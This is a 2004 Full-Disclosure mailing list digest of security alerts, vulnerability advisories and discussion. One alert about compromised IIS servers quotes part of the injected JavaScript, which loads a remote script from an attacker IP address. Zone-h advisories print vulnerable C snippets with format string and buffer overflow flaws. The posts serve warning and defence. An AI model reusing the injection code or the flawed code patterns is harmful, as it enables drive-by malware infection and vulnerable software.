Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] server administration

From: Darren Spruell (darren_spruellsento.com)
Date: Fri Jun 25 2004 - 11:48:32 CDT

Mohit Muthanna wrote:

> I'd suggest you read up on SNMP. And check out the following tools
> (google them):
>
> - net-snmp ( an SNMP agent )
> - nagios ( very sophisticated network management tool )
> - nmap ( good discovery tool )
> - ntop ( traffic analysis, RMON agent, performance monitoring )
> - sar ( system performance monitoring )
> - argus (network performance monitornig)
> - rsync (distributed configurations, files etc.)
> - openssh (if you don't know what this is, you're in trouble)
> - rcs, cvs or subversion (change control)
>
> There are also a number of commercial tools availabe, but the above
> list encompasses most of what you will need.

I have to throw cfengine into this mix, too.

http://www.cfengine.com/

Free and perfect for management/deployment to large numbers of
Windows/Unix boxen.

--
DS

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] server administration

From: Mohit Muthanna (mohit.muthannagmail.com)
Date: Fri Jun 25 2004 - 12:00:53 CDT

> I have to throw cfengine into this mix, too.
>
> http://www.cfengine.com/
>

Of course... how could I forget cfengine. Another godsend.

Also just remembered: syslog-ng is a good replacement for syslog.

Thx,
Mohit.

--
Mohit Muthanna [mohit (at) muthanna (uhuh) com]
"There are 10 types of people. Those who understand binary, and those
who don't."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] VX: Old worm in new shoes (AntiQFX)

From: Randal, Phil (prandalherefordshire.gov.uk)
Date: Fri Jun 25 2004 - 11:51:07 CDT

Nick FitzGerald [nickvirus-l.demon.co.uk] wrote:

> That's odd -- I had the file scanned with 22 different virus
> scanners and only three (NAV, Panda and ClamAV) missed detecting it
> as "AntiQFX" or something very similar...

New patterns for ClamAV have just been released (daily.cvd version 371)
which detect it.

Cheers,

Phil
----
Phil Randal
Network Engineer
Herefordshire Council
Hereford, UK

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Evidence of a ISC being hacked?

Valdis.Kletnieksvt.edu
Date: Fri Jun 25 2004 - 12:03:49 CDT

On Thu, 24 Jun 2004 21:12:46 PDT, VX Dude <vxdude2003yahoo.com> said:

> "...and the build broke on OTHER systems
> because there wasn't a vsnprintf() in the vendor libc
> - and your boss is
> telling you TO GET THE THING TO BUILD, NOW....
>
> The programmer who is willing to swear on a Bible that
> they have *never* in
> their professional careers done something like this
> because they were in a
> time crunch is either a newbie or a complete liar."
>
> The word "boss" give me the illusion of some profit
> being made. Once again I could just be paranoid.

Remember that the majority of code in this world is *still* custom-written
applications code inside corporations. And I was discussing the *GENERAL*
scenario of how such things happen.

If "boss" offends you, replace it with "open source project leader".

You want an example in the open source world, wander over to the Gaim project
on SourceForge, where within the last 48 hours or so, the Yahoo people changed
their protocol again, leaving all the Trillian and Gaim users unable to connect
to Yahoo. Awful lot of duplicate bug reports filed, and "me-too" followups to
bug reports, and so on.

That's the sort of time when corners get cut, code auditing may not be quite as
stringent, and so on. In fact, the *last* time that Yahoo changed the
protocol, the resulting patch flurry ended up with a buffer overflow in Gaim
and Trillian (found by Stefan Messier, if I remember right), and the lack of
proper paperwork resulted in some GPL questions against Trillian....

(I'm only picking on the Gaim project because I'm aware of it, partly because
my fix for an earlier Gaim bug ended up dragged into the Gaim/Trillian GPL
mess... All you fans of other open-source projects, quit smirking - someday
*you*'ll be in that same position - I guarantee it, based on a quarter-century
of observing this industry... ;)

> Apparently the idea of people patching open source
> products just shows how much of a newbs we are.

See above... just because it's open source doesn't mean it doesn't have those
same problems.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001

iD8DBQFA3Fr1cC3lWbTT17ARAlATAJ9DSuSLfe3A74/jrIu/cHBFY6y1vgCgicKD
AVX/1jYx4yQVr82HT2X7NcY=
=d8Jz
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] VX: Old worm in new shoes (AntiQFX)

From: Raymond Dijkxhoorn (raymondprolocation.net)
Date: Fri Jun 25 2004 - 11:59:50 CDT

Hi!

> > Same thing is with AVP, ClamV & F-Prot.
> > Only Sophos detects this file as AntiQFX.F variant.

> That's odd -- I had the file scanned with 22 different virus scanners
> and only three (NAV, Panda and ClamAV) missed detecting it as "AntiQFX"
> or something very similar...

Bitdefender detects it also, and so does ClamAV right now, in the last
virus signature update its included.

Bye,
Raymond.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients

From: insecure (insecureameritech.net)
Date: Fri Jun 25 2004 - 12:36:41 CDT

Berbew/Webber/Padodor Trojan, according to Lurhq.

http://www.lurhq.com/berbew.html

joe wrote:

>For the IIS side....
>
>http://www.microsoft.com/security/incident/download_ject.mspx
>
>
>
>Microsoft teams are investigating a report of a security issue affecting
>customers using Microsoft Internet Information Services 5.0 (IIS) and
>Microsoft Internet Explorer, components of Windows.
>
>Important Customers who have deployed Windows XP Service Pack 2 RC2 are not
>at risk.
>
>Reports indicate that Web servers running Windows 2000 Server and IIS that
>have not applied update 835732, which was addressed by Microsoft Security
>Bulletin MS04-011, are possibly being compromised and being used to attempt
>to infect users of Internet Explorer with malicious code.
>
>
>
>
>
>
>-----Original Message-----
>From: full-disclosure-adminlists.netsys.com
>[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Peter Kruse
>Sent: Thursday, June 24, 2004 7:22 PM
>To: full-disclosurelists.netsys.com
>Subject: [Full-Disclosure] New malware to infect IIS and from there jump to
>clients
>
>Hi all,
>
>This is a heads up.
>
>A new malware has been reported from several sources so it appears to be
>fairly widespread already.
>
>The malware spreads from infected IIS servers to clients that visit the
>webpage of the infected server. How the IIS servers was compromised in the
>first place is unfortunately still unknown (any info on that would be
>appreciated).
>
>The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does
>so by running a javascript that apparently gets appended to several files in
>the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http://
>217.107.218.147/xxx.html that contains the following code:
>
><script language="Javascript">
>
> function InjectedDuringRedirection(){
> showModalDialog('md.htm', window, "dialog
>Top: -10000\;dialogLeft:-10000\;dialog Height :1\;dialog Width
>:1\;").location= " java script:'<SCRIPT SRC =\\' http://
>217.107.218.147/shellxxx.js\\'> <\ /script>'";
>
>[snip - you get the picture, right?]
>
>I had to put in some spaces to get past trivial content filtering.
>
>>From that point it will try to run the malware in a 1x1 dialogbox in the
>following order:
>
>shellscript_loadxxx.js
>shellxxx.js
>
>The shellxxx.js will try to drop "msits.exe" (51.712 bytes) a
>trojan-downloader and run it.
>
>Consider to deny access to http://217.107.218.147 in your firewall. This
>will at least prevent client PCs from getting infected.
>
>Further information can be found in the daily log from SANS:
>http://isc.sans.org/
>
>Regards
>Peter Kruse
>http://www.csis.dk
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] format string vulnerability in Gnats

From: Khan Shirani (khan_shiraniyahoo.com)
Date: Fri Jun 25 2004 - 12:42:54 CDT

Zone-h Security Advisory Date of discovery : 21 june 2004
Date of release : 24 june 2004 http://www.zone-h.org

Bug found by Khan Shirani
<shiranizone-h.org>

---------------------------------------
Software : GNU Gnats 4.00
Bugs : formats string bug(s)
Risk : low/medium
Platform : *nix
---------------------------------------

Description:
============
GNU GNATS is a set of tools for tracking bugs reported by users to a central site.
It allows problem report management and communication with users via various means.
GNATS stores all the information about problem reports
in its databases and provides tools for querying, editing, and maintenance of the databases.
http://www.gnu.org/software/gnats/

Vulnerability:
==============
A format string bug has been discovered in the Gnats package which
could *possibly* be exploited to execute arbitrary commands.

vulnerable code:
================

----------------------
gnats-4.0\gnats\misc.c
#ifdef HAVE_SYSLOG_H
case SYSLOG:
syslog (severity, buf);
break;
#endif
----------------------

Vendor Notice:
==============
The Gnats team has been notified of the discoveries via <bug-gnatsgnu.org>
No patch is available at this time

Copyright
=========
Contents may not be altered without notification to original author
permission is granted to reproduce this advisory on public databases.

shiranizone-h.org
and all the zone-h team.
http://www.zone-h.org

__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Multiple remote & local buffer overflows discovered in Drcatd

From: Khan Shirani (khan_shiraniyahoo.com)
Date: Fri Jun 25 2004 - 12:39:31 CDT

Zone-h Security Advisory
Date of discovery : 24 june 2004
Date of release : 25 june 2004
Bug found by Khan Shirani
<shiranizone-h.org>
http://www.zone-h.org

---------------------------------------
Software : Drcatd
Bugs : Buffer Overflows , Remote and local (multiple)
Risk : low
Platform : *nix
---------------------------------------

Description:
========
Dr.Cat (Dave's Remote Cat) concatenates a file on a remote Linux host that is running the
Dr.Cat daemon (drcatd) to stdout in the clients terminal. It authenticates users versus
the standard shadow password authentication facility and spawns a process with that users
permissions to attempt to access the requested file
http://www.joltedweb.com/drcat/

Vulnerability:
=========
Muliple local buffer overflows have been discovered . In addition to this , remote exploitation
is also possible due to a lack of boundry checking of input once a user has been authenticated.
The vulnerability exists when the remote user sends an overly long filename that doesnt exist.
This is handled by an sprintf() call which is where the overflow will occur
vulnerable code:
===========
----------------------
drcat-0.5.0-beta\src\drcatd.c
sprintf(fdne_msg, "%s - File Does Not Exist", buf);
logIt(fdne_msg);
sprintf(fd_msg, "%s - File Does Not Exist\n", buf);
len = sizeof(fd_msg);
local_send(new_fd, fd_msg, len);
exit(1);
----------------------
NOTE: Due to the exit(1) from the above snippet, exploitation of this vulnerability is not possible within x86 arche's.

Vendor Notice:
==========
The vendor has been notified via <davejoltedweb.com>
Copyright
=======

Contents may not be altered without notification to original author
permission is granted to reproduce this advisory on public databases.
shiranizone-h.org
and all the zone-h staff.
http://www.zone-h.org

__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] VX: Old worm in new shoes (AntiQFX)

From: Eric Paynter (ericarcticbears.com)
Date: Fri Jun 25 2004 - 12:20:28 CDT

On Fri, June 25, 2004 8:58 am, Nick FitzGerald said:
> That's odd -- I had the file scanned with 22 different virus scanners
> and only three (NAV, Panda and ClamAV) missed detecting it as "AntiQFX"
> or something very similar...

ClamAV is now detecting it as well. They must have updated their sigs
within the last hour.

$ clamscan MSCDEX.zip
MSCDEX.zip: Worm.AntiQFX.A FOUND

-Eric

--
arctic bears - affordable email and name services yourdomain.com
http://www.arcticbears.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Fwd: Alert: IIS compromised to place footer JavaScript on each page

From: B3r3n (B3r3nargosnet.com)
Date: Fri Jun 25 2004 - 12:50:08 CDT

FYI

>There have been several reports of IIS servers being compromised in a
>similar fashion. The result is that each has a document footer specified
>which is JavaScript which causes the viewing browser to load a page from
>a malicious website. The loaded page installs a trojan via one of
>several attack methods attempted. According to Computer Associates, at
>least one of those methods remains unpatched. The malicious web page the
>client was being sent is no longer available.
>
>At this point it does not look like this is a widespread issue, but I'd
>like to see what you have seen.
>
>1. There is so far no reasonable explanation as to how the IIS servers
>are being compromised. The JavaScript which loads the attacking page
>checks first to see if the browser is viewing via HTTPS, and if so, then
>checks to see if there is a cookie on the client machine which starts
>with "trk716". If there isn't such a cookie, then the JavaScript
>executes causing the malicious page to be delivered to the victim. The
>cookie expires in 10 minutes.
>
>- Check your IIS Servers and verify whether the "Enable Document Footer"
>option has been enabled (inspect the Documents tab in IIS Manager for
>each site, or inspect the metabase for the EnableDocFooter is set to
>true.
>
>- If Document Footers are enabled and they shouldn't be, check which
>files are being specified as the footer document. If you have been
>attacked you will find files named similar to "iis7#.dll" in the
>\inetsrv directory. There may be one for each of your virtual
>directories.
>
>- ftpcmd.txt, agent.exe, and ads.vbs have also been found on compromised
>machines. ftpcmd gets the agent.exe, which is subsequently executed
>resulting in the metabase being modified by executing the ads.vbs with
>appropriate parameters.
>
>Questions for those of you who have been compromised:
>
>a) Do you have an SSL certificate on any site on the compromised box?
>There has been some speculation that this may have something to do with
>the attack.
>
>b) Were all of the sites on the compromised machine modified to include
>a document footer? If not, is there anything unique about the ones that
>were modified?
>
>c) If you had more than one machine compromised, did you have any
>similarly exposed IIS servers that weren't compromised? There is
>speculation that the attack is specific to IIS 5.0.
>
>d) Had you applied MS04-011 but not yet had the machine rebooted? A
>couple of the reports from compromised machines indicated they had
>applied the patch but not yet rebooted the machine. Try to be sure
>whether the machine was rebooted before indicating it was "fully
>patched." Please provide the details of the compromised box, its OS
>version, SP level, patches applied, plus any other components which may
>have been installed (e.g. Cold Fusion, etc...)
>
>e) Can you send me a copy of the agent.exe, or whatever name it may be?
>If so, please rename the extension to .ts and send it to
>Russ.CooperTruSecure.ca
>
>f) What directory did you find the ftpcmd.txt and/or agent.exe in?
>
>g) Check your logs for anything dated similar to the datetime of
>ftpcmd.txt, let me know if you find anything suspicious.
>
>2. The attack against the clients has been specified as being;
>
>Microsoft - Download.Ject
>http://www.microsoft.com/security/incident/download_ject.mspx
>Symantec - JS.Scob.Trojan
>http://securityresponse.symantec.com/avcenter/venc/data/js.scob.trojan.h
>tml
>FSecure - Scob
>http://www.f-secure.com/v-descs/scob.shtml
>Computer Associates - JS.Toofer
>http://www3.ca.com/securityadvisor/virusinfo/virus.aspx?id=39438
>
>CA provides the most information so far, indicating that the trojan are
>polymorphic variants of Win32.Webber. They claim the malicious web page
>exploits the Modal Dialog Zone Bypass discovered earlier in June. They
>also claim it is exploiting the vulnerability fixed by MS04-013 (MHTML).
>
>Questions:
>
>a) If you got a copy of the attacking page, can you send it to me?
>
>b) What site served up the document footer that caused you to be sent
>the malicious page?
>
>Cheers,
>Russ - NTBugtraq Editor
>
>-----
>NTBugtraq Editor's Note:
>
>Want to reply to the person who sent this message? This list is configured
>such that just hitting reply is going to result in the message coming to
>the list, not to the individual who sent the message. This was done to
>help reduce the number of Out of Office messages posters received. So if
>you want to send a reply just to the poster, you'll have to copy their
>email address out of the message and place it in your TO: field.
>-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Microsoft and Security

http-equivexcite.com
Date: Fri Jun 25 2004 - 13:53:44 CDT

Where is Microsoft now "protecting their customers" as they love
to bray? Should not someone in authority of this public company
step forward and explain themselves at this time?

All of sudden panic is being created across the WWW with "IIS
Exploit Infecting Web Site Visitors With Malware", "Mysterious
Attack Hits Web Servers", "Researchers warn of infectious Web
sites" all stemming from all news accounts from an
unpatched "problem" with Internet Explorer now two weeks old and
counting, which in fact in reality stems from 10 months ago,
that being the adodb.stream safe for scripting control with
write capabilities.

What exactly is being done about this? Nothing. What does
multiple billions of dollars buy you today. Nothing. However for
$20 million you can almost fly to the moon.

Someone ought to step forward and explaini what exactly is
happening at this public company. The great "protector of their
customers". One might even suggest that their entire "security"
mandate be re-examined. What exactly do they consider a
vulnerability? Something that suits them or something that's
cost effective to fix. So what, a few people lose their
identities, have a few dollars extracted from their bank
accounts, have their home pages reset, we'll fix it when it
suits us as we have to be on budget this quarter. The Big Boss
says $40 billion isn't enough this year.

A vulnerability:

http://www.microsoft.com/technet/archive/community/columns/securi
ty/essays/vulnrbl.mspx

"A security vulnerability is a flaw in a product that makes it
infeasible – even when using the product properly—to prevent an
attacker from usurping privileges on the user's system,
regulating its operation, compromising data on it, or assuming
ungranted trust."

what this gibberish? For the past 10 months the adobd.stream
object is capable of writing files to the "all important
customer's" computer. It has real world consequences. It rapes
their computer. Does it fit into the gibberish custom
definition. Plain and simple: "A security vulnerability is a
flaw in a product that makes it infeasible". What kind of
language is this. Reads like the financial department conjured
it up.

Disabling scripting won't solve it. Putting sites in one of the
myriad of "zones' won't solve it. Internet Explorer can
trivially be fooled into operating in the less than secure so-
called "intranet zone" and it can be guided there remotely.

What's happening here. Where is the Microsoft representative
explaining all of this to the shareholders and "customers" they
so dearly wish to protect. This is unacceptable. Someone must
be held accountable.

--
http://www.malware.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Microsoft Identity Integration Server

From: Michael Schaefer (mbsmistrealm.com)
Date: Fri Jun 25 2004 - 14:35:51 CDT

We are thinking about trying out this technology.

Has anyone used this? Are there any known security risks?

M

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] server administration

From: Black, Braden (BBlackVSCat.com)
Date: Fri Jun 25 2004 - 14:45:14 CDT

> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of harry
> Sent: Monday, June 21, 2004 6:59 AM
> To: full-disclosurelists.netsys.com
> Subject: [Full-Disclosure] server administration
>
>
> hi all,
>
> i know this is not really a security thing, so if someone
> could tell me
> where the correct place to ask is... i would really appreciate it...

http://www.infrastructures.org

Topics addressed on Infrastructures.org include the following (quoted from
the index page):
" * Remote management
    * Secure communications
    * Distributed Monitoring
    * Unattended network-based installation
    * Automatic host administration (no need to manually track or apply
changes to managed hosts)
    * Unified desktop and server management
    * Single System Image
    * Single Signon
    * Continuous, long-term live host management (no re-installation needed
to apply upgrades)
    * Ordered, validated changes to any given host
    * Prototype and class-based host definitions
    * A coherent framework for managing all of the above"

Their mailing list would be much more appropriate for your question, IMHO.

HTH,
- Braden

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Microsoft and Security

http-equivexcite.com
Date: Fri Jun 25 2004 - 11:01:34 CDT

Where is Microsoft now "protecting their customers" as they love
to bray? Should not someone in authority of this public company
step forward and explain themselves at this time?

All of sudden panic is being created across the WWW with "IIS
Exploit Infecting Web Site Visitors With Malware", "Mysterious
Attack Hits Web Servers", "Researchers warn of infectious Web
sites" all stemming from all news accounts from an
unpatched "problem" with Internet Explorer now two weeks old and
counting, which in fact in reality stems from 10 months ago,
that being the adodb.stream safe for scripting control with
write capabilities.

What exactly is being done about this? Nothing. What does
multiple billions of dollars buy you today. Nothing. However for
$20 million you can almost fly to the moon.

Someone ought to step forward and explaini what exactly is
happening at this public company. The great "protector of their
customers". One might even suggest that their entire "security"
mandate be re-examined. What exactly do they consider a
vulnerability? Something that suits them or something that's
cost effective to fix. So what, a few people lose their
identities, have a few dollars extracted from their bank
accounts, have their home pages reset, we'll fix it when it
suits us as we have to be on budget this quarter. The Big Boss
says $40 billion isn't enough this year.

A vulnerability:

http://www.microsoft.com/technet/archive/community/columns/securi
ty/essays/vulnrbl.mspx

"A security vulnerability is a flaw in a product that makes it
infeasible – even when using the product properly—to prevent an
attacker from usurping privileges on the user's system,
regulating its operation, compromising data on it, or assuming
ungranted trust."

what this gibberish? For the past 10 months the adobd.stream
object is capable of writing files to the "all important
customer's" computer. It has real world consequences. It rapes
their computer. Does it fit into the gibberish custom
definition. Plain and simple: "A security vulnerability is a
flaw in a product that makes it infeasible". What kind of
language is this. Reads like the financial department conjured
it up.

Disabling scripting won't solve it. Putting sites in one of the
myriad of "zones' won't solve it. Internet Explorer can
trivially be fooled into operating in the less than secure so-
called "intranet zone" and it can be guided there remotely.

What's happening here. Where is the Microsoft representative
explaining all of this to the shareholders and "customers" they
so dearly wish to protect. This is unacceptable. Someone must
be held accountable.

--
http://www.malware.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Microsoft Identity Integration Server

From: Eric Paynter (ericarcticbears.com)
Date: Fri Jun 25 2004 - 16:03:19 CDT

On Fri, June 25, 2004 12:35 pm, Michael Schaefer said:
> Are there any known security risks?

It's made by Microsoft. Isn't that a significant security risk?

-Eric

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [ GLSA 200406-20 ] FreeS/WAN, Openswan, strongSwan: Vulnerabilities in certificate handling

From: Thierry Carrez (koongentoo.org)
Date: Fri Jun 25 2004 - 15:50:01 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200406-20
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: FreeS/WAN, Openswan, strongSwan: Vulnerabilities in
            certificate handling
      Date: June 25, 2004
        ID: 200406-20

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

FreeS/WAN, Openswan, strongSwan and Super-FreeS/WAN contain two bugs
when authenticating PKCS#7 certificates. This could allow an attacker
to authenticate with a fake certificate.

Background
==========

FreeS/WAN, Openswan, strongSwan and Super-FreeS/WAN are Open Source
implementations of IPsec for the Linux operating system. They are all
based on the discontinued FreeS/WAN project.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 net-misc/freeswan < 2.04-r1 >= 2.04-r1
                                                            == 1.99-r1
  2 net-misc/openswan < 2.1.4 >= 2.1.4
                                                          == 1.0.6_rc1
  3 net-misc/strongswan < 2.1.3 >= 2.1.3
  4 net-misc/super-freeswan <= 1.99.7.3 Vulnerable!

Description
===========

All these IPsec implementations have several bugs in the
verify_x509cert() function, which performs certificate validation, that
make them vulnerable to malicious PKCS#7 wrapped objects.

Impact
======

With a carefully crafted certificate payload an attacker can
successfully authenticate against FreeS/WAN, Openswan, strongSwan or
Super-FreeS/WAN, or make the daemon go into an endless loop.

Workaround
==========

There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version.

Resolution
==========

All FreeS/WAN 1.9x users should upgrade to the latest stable version:

    # emerge sync

    # emerge -pv "=net-misc/freeswan-1.99-r1"
    # emerge "=net-misc/freeswan-1.99-r1"

All FreeS/WAN 2.x users should upgrade to the latest stable version:

    # emerge sync

    # emerge -pv ">=net-misc/freeswan-2.04-r1"
    # emerge ">=net-misc/freeswan-2.04-r1"

All Openswan 1.x users should upgrade to the latest stable version:

    # emerge sync

    # emerge -pv "=net-misc/openswan-1.0.6_rc1"
    # emerge "=net-misc/openswan-1.0.6_rc1"

All Openswan 2.x users should upgrade to the latest stable version:

    # emerge sync

    # emerge -pv ">=net-misc/openswan-2.1.4"
    # emerge ">=net-misc/openswan-2.1.4"

All strongSwan users should upgrade to the latest stable version:

    # emerge sync

    # emerge -pv ">=net-misc/strongswan-2.1.3"
    # emerge ">=net-misc/strongswan-2.1.3"

All Super-FreeS/WAN users should migrate to the latest stable version
of Openswan. Note that Portage will force a move for Super-FreeS/WAN
users to Openswan.

    # emerge sync

    # emerge -pv "=net-misc/openswan-1.0.6_rc1"
    # emerge "=net-misc/openswan-1.0.6_rc1"

References
==========

  [ 1 ] Openswan/strongSwan Authentication Bug
        http://lists.openswan.org/pipermail/dev/2004-June/000370.html

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

     http://security.gentoo.org/glsa/glsa-200406-20.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFA3I/4vcL1obalX08RAkFTAJ9G6U5OAw9poy1YiHAS6sKEf+KSFQCfQJx+
kgh6zpXu/VV8W77ZrkawRgA=
=m9Rn
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Microsoft Identity Integration Server

Valdis.Kletnieksvt.edu
Date: Fri Jun 25 2004 - 16:18:22 CDT

On Fri, 25 Jun 2004 15:35:51 EDT, Michael Schaefer <mbsmistrealm.com> said:

> Has anyone used this? Are there any known security risks?

(None of this is specific to the product, but all of it is stuff that we as an
industry keep re-botching over and over, so I'll mention it here anyhow...)

Three (ok, two and a half) come to mind:

1) There's an inherent "eggs in one basket" issue with *any* sort of
single-sign-on or single-identifier scheme. Be sure you understand all the
ramifications (all too many places don't think it ALL through).

2) After Microsoft's original "all your identity are belong to us" Passport,
it's just *too* easy to take a cheap shot at anything called a Microsoft
Identity Integration Server.... However, you *will* want to double-check how
you will interface this with any software at your site that doesn't believe in
The Microsoft Way (compare with the early days of Active Directory, and trying
to get a non-MS box to play nice....). This will undoubtedly lead to a
home-grown interface, which should have big screaming "AUDIT ME CAREFULLY"
stickers all over it....

3) *all* software has bugs. The Unix 'passwd' and 'login' programs have had
bugs. Kerberos had bugs. Yellow Pages had bugs. This product would be truly
unusual if it DIDN'T have bugs, especially at this point in its evolution. Be
sure you make plans for when (not if) a not-yet-publicly-known issue
surfaces....

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001

iD8DBQFA3JaecC3lWbTT17ARAug6AKCG1QhB1UW1PBNZsJddKEJLrV4wSgCgmo79
TcEHSlmYDPBYiX2Kt709jgg=
=Ah9f
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [SECURITY] [DSA 525-1] New apache packages fix buffer overflow in mod_proxy

debian-security-announcelists.debian.org
Date: Fri Jun 25 2004 - 16:04:06 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 525-1 securitydebian.org
http://www.debian.org/security/ Matt Zimmerman
June 24th, 2004 http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package : apache
Vulnerability : buffer overflow
Problem-Type : remote
Debian-specific: no
CVE Ids : CAN-2004-0492

Georgi Guninski discovered a buffer overflow bug in Apache's mod_proxy
module, whereby a remote user could potentially cause arbitrary code
to be executed with the privileges of an Apache httpd child process
(by default, user www-data). Note that this bug is only exploitable
if the mod_proxy module is in use.

Note that this bug exists in a module in the apache-common package,
shared by apache, apache-ssl and apache-perl, so this update is
sufficient to correct the bug for all three builds of Apache httpd.
However, on systems using apache-ssl or apache-perl, httpd will not
automatically be restarted.

For the current stable distribution (woody), this problem has been
fixed in version 1.3.26-0woody5.

For the unstable distribution (sid), this problem has been fixed in
version 1.3.31-2.

We recommend that you update your apache package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5.dsc
      Size/MD5 checksum: 668 728e205962ce1f02155cdeeae3b33596
    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5.diff.gz
      Size/MD5 checksum: 299155 1f6504cbb56e55b0b67b5f911dc7601a
    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26.orig.tar.gz
      Size/MD5 checksum: 2586182 5cd778bbe6906b5ef39dbb7ef801de61

  Architecture independent components:

    http://security.debian.org/pool/updates/main/a/apache/apache-doc_1.3.26-0woody5_all.deb
      Size/MD5 checksum: 1129912 25ce8bbf0d753fa2b7a6e26c32f34789

  Alpha architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5_alpha.deb
      Size/MD5 checksum: 395496 3681480dcd48c186aa3759e7a3aeabe0
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody5_alpha.deb
      Size/MD5 checksum: 925884 5deb71887a2bda9b51a84d52809ee96d
    http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody5_alpha.deb
      Size/MD5 checksum: 713886 ef9f3a034e9e995397c966c4ccb1ba14

  ARM architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5_arm.deb
      Size/MD5 checksum: 361138 20108dbf929f356aeb02d9adf40317c7
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody5_arm.deb
      Size/MD5 checksum: 838572 bace0690140cc427ae34bc82a169ebd1
    http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody5_arm.deb
      Size/MD5 checksum: 544356 7ebfaea0a36f5661c82f8facbeb97199

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5_i386.deb
